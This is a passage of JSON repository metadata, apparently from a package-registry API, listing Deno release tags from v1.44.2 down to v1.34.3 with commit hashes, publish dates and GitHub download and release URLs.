:"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/